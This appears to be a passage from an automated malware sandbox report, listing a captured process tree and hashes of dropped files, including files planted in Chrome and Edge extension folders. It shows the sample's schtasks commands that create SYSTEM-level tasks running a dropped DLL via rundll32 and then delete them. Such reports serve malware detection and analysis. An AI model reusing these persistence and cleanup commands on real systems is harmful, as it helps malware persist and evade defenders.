C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hcXcPAZNWkBjDRtiAcA2" /F /xml "C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CtcwvJUdbvqSdFcLs" /SC once /ST 17:52:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll\",#1 /QIsite_idWIB 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CtcwvJUdbvqSdFcLs"2⤵PID:1112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eKTzntQiDjkvtKkfQ"2⤵PID:2408
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll",#1 /QIsite_idWIB 3851181⤵PID:4948
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll",#1 /QIsite_idWIB 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:4916 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CtcwvJUdbvqSdFcLs"3⤵PID:4276
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ebc5dd911d60d18866419aa5d21bda06
SHA11860762977cf57cffcf78d0ccc19f2f98d887080
SHA25609c5f307856e0740cf6c7a5320939a9b117bb58b35f5fe13319e1e5f1707a3db
SHA51201c08e2df9612dc047991e129c86a5e08ffd5e61c28cb48d5029519431fd1bf616a3af513ec2d547314e62bb92e85a958d446b0358080dcaafe32132de7f17e2
-
Filesize
2KB
MD50d77523629a6adfdb0982221e53fbc67
SHA1c7eccf68eefed77f929a4316bd0e3c11f9573755
SHA25678f3d2fe4f2c931611b9600ec31b1d69975d30ceec051dea9143beb3998eb01c
SHA5120a4d1e2fe4eede33d6334c4aa20a86164da4d521e2d2575e0c46419db8de7ff32d76fbca56311eff52893f61b1fc06dac4bb222c7cecf6b4e94a869b50901846
-
Filesize
2KB
MD58d0a21d486dcd77ab10e1804e0348b28
SHA1a79fb9c55a546c2c154a650bfe05630ebb5278af
SHA256b2d0283e798b6a410c7d86fd7404997e1ced14c5ee2153bfab80d2261776a032
SHA512f9ee6f8d4a143a3155739109ad4b1a63c6e63a36f0b89f12d3aac6c10065bd0c2f388749c5a45c8f138b8c9685f088cd153266f7ac7370eb8081a45766061807
-
Filesize
2KB
MD532dbe186449b9e95e474a229372a02fb
SHA1e17a10c3676caa434ad5d6e0aba162f76dfa0cd6
SHA256d8da474142896decd552581966103be1c743c7a52675a649f8b97e51ffefcb1a
SHA5123c953ed4b866dbc8e927133fc447ed4ba87927985a99b9ad921fd05108b9079fa81bb4f3134f05f3fd8702c4ad1833b792bfb2b39a91693813744d3c92b71555
-
Filesize
2.0MB
MD53a8199aab1c74eae07fe583af9439e48
SHA128bbd7e62698c90631cd51ab23e773a1a9a2fe1b
SHA256de3c96adcc032cf625d6811ac747c5189e2dfd7d4b097cb019bbeee552b1f2cb
SHA512730d34973229a6a28e0584fae5ac307bb399907061b78563db648877579587fec59dd5eedcab9a565e770806950829a5fa58fb72db00d178e234897186351c3d
-
Filesize
2KB
MD545eaebc48b488978ca753bd709465b8c
SHA1bdccf353bf5f6b4a2210f547a70d79b94e7c7044
SHA256bbe1d2ca2b6c8b775a6860fd7b1f94eaeb5f4371f7ac98fa73cd571b9ee7aeb2
SHA51274a2e98e54fe50123d3bf228a405eaebb22e66388f5e96cfe320c622ebfd27f4b82f4777febd32934464850052e5e406e9419c8d5a51679a2a0a77b49e8dba7f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD54a7b328f04beb47b6ac54bcf9d5ae4d3
SHA1e45aa1edbb79c8148c55b647a9f62de6c961e4e1
SHA256a5148b8448cd17b6eecf2c997f9cbb40ad8271ac55b0a0215b0c1a979289c850
SHA512a37a30b3d0fa3770b9bfe92c56e8c5d1d05fd11707d4d16a38ef1fc320da848f447df4a52e34b1bff8a0322519a1dfbf833542ebc13a55a5e5751b1bf0ff36a6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD595e6fb5db9e2ca61ea5b4309d1aff816
SHA187fd996b8afbc0c159925b6e7238835bba8f22dd
SHA256bd8fa2732c22533fe8ec7e136276d787e411b664807b49cfe86503e49837186e
SHA512179e514f84d59cbfbcf065172f662761c199927d41bc33ea0eded7067659e8f03beba1d5d1085a3c7e1997cb993119f3ea94076c9fa9ff7c84dd3c6fe7079b84
-
Filesize
11KB
MD5f7ea21a8fddaba9501a691d170906825
SHA1b7ce7dd9b54c9b47f1b5e718450992293ab707d0
SHA2568ed5c87fa3283933acf4db8d457a291c12081eca783337cce61a1e52d9b240bc
SHA51216aa131666d33ff4b7c0789482707ce29050a2ede1166670ade15d77c7c542261c8de9fcda3e7e26a7ffd9587f5ab4ec36f36a52eeb467ec0c98b537243a66a3
-
Filesize
6.7MB
MD50a35bbd6448122353a2d8ea91cff5781
SHA1742ec335853eba4e5b41200fa46958328e90cb2f
SHA256ccc5f37eb38a137f33f8f0d603f88f178056a9c576c316f6a366727e07c9a0bb
SHA5125c4dbc03b3c43ddea27bb6df56e5e317c64237018e325a84b257847e4223f0c3302f10b9ab5956ef7e197c237f7d346fbddbb7ee06856b42314cc0b85f300b8f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD50fccc75bd9c0494a133798b5b6d398da
SHA1d7b23c6bf04704834ead0e99a4ac907a652e0719
SHA256be435e0cfc5a5a78e736bcd57bf76725f5a91e3ce5d099eeeab9084e8deb2682
SHA5126443c4d9e07059b032905863b108a62fb4d8749ae3afcdc746e92f7e3abaccadb4accc32dfad893d4bc926769a26beb4836e3c216e9e378342d22de38262f634
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5f5caea41ccb7c13988a362ef6b2f3a1c
SHA1f31ad94f89bd21eb58f73ec83b11613f9ef3f199
SHA2561a90087699459e1c6d059bc5739b1a7270c3ebe493778a70bd5b2bbf4194061a
SHA512db305daae6c012b820da9186f94a6f8a1cc8e1e3e4ba9d7eafa6523b8bc3188310a338750684dd2e062e36e7882dab3892325a3025045d62572c000e118cc65a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD57cd1fc869c686c660073b9e811a89e3c
SHA167acf340bead8ee326dacbb3f9c9e91775d8adac
SHA256c6a11f8fc328b7619e240da4d08b884472b562ea5607da2481c32cb8fca87c9c
SHA5120a584776f135737967d6d7e61fabb75d78127fb9e2ce734e306db86d337b078b59a41a942f6ed9809fbef203dcd00919abe4eca07effc1b0a65a5e2df3351492
-
Filesize
6.4MB
MD509033b0a28848c69df1d9123aa263242
SHA1ea1f63365ab26e8250eec85496f7b7baab1c5619
SHA256fc35ae17402f158f5fc7f179d35542c363ca5681c82e72d7f0f59f80f86b2ee7
SHA5129e99a8a584f4831bed290361d719e6a9561455d22b9e650d68d970d2258bd7db465edc7b9c9a9e9565aeefbe871e298dba66470c260b51e4482b76d43f13097d
-
Filesize
6KB
MD5fb11ad5cc456952496ec84f9330e7017
SHA175457e8a9d40a5a63e72bc80c5ec974761185898
SHA256181ae1748ee78f79f3fb2956a71ba0959082b9e67f2a72dc2b459110bb2be859
SHA512a2252651ea91142e9a21896455b43f7162c15992bef62725af6201f5cacbc5f3c646e465c6e311a9a261549092b59c659e4b23ee940ea7af04e373b7d4564e1b